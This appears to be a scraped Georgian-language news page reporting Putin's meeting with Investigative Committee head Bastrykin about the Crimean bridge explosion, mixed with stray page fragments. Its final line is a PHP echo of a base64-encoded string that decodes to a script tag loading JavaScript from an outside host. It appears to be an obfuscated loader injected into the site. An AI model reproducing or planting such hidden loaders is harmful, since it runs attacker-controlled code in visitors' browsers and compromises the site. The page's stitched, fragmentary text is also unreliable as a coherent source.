celsiusi
ავერსი შნაიდერი
რუსეთის პრეზიდენტი ვლადიმერ პუტინი რუსეთის საგამოძიებო კომიტეტის ხელმძღვანელს, ალექსანდრე ბასტრიკინს შეხვდა და ყირიმის ხიდის აფეთქების დეტალები განიხილა.
 
როგორც ბასტრიკინმა შეხვედრისას აღნიშნა, „ყირიმის ხიდის აფეთქებამდე, სატვირთო ავტომობილმა საქართველოს, სომხეთის, ჩრდილოეთ ოსეთის და კრასნოდარის ტერიტორია გაიარა“.
 
ბასტრიკინის თქმით, გამომძიებლებისთვის ცნობილია გადამზიდავები და ტერაქტის მომზადებაში ჩართული პირები. რუსეთის საგამოძიებო კომიტეტში აცხადებენ, რომ აფეთქებაში მონაწილეობდნენ როგორც უკრაინის სპეცსამსახურები, ასევე რუსეთის მოქალაქეები და უცხო ქვეყნები.
 
ალექსანდრე ბასტრიკინის თქმით, ეს იყო ტერორისტული აქტი, რომელიც მიზნად ისახავდა სამოქალაქო ინფრასტრუქტურის ობიექტის განადურებას.
458
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");